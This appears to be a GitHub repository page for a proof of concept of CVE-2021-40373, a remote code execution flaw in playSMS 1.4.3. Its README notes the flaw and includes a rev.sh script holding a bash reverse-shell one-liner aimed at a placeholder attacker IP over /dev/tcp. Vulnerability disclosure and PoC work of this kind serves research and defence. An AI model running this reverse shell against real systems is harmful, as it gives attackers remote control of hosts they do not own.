Skip to content

maikroservice/CVE-2021-40373

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 

Repository files navigation

CVE-playsms

There is a vulnerability in playsms 1.4.3 that allows potential attackers to execute remote code execution.

how to reproduce RCE (shell):

https://playsms.org/

rev.sh

#!/usr/bin/bash
bash -c "bash -i >& /dev/tcp/<attackerIP>/1234 0>&1"

About

CVE-2021-40373 - remote code execution

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published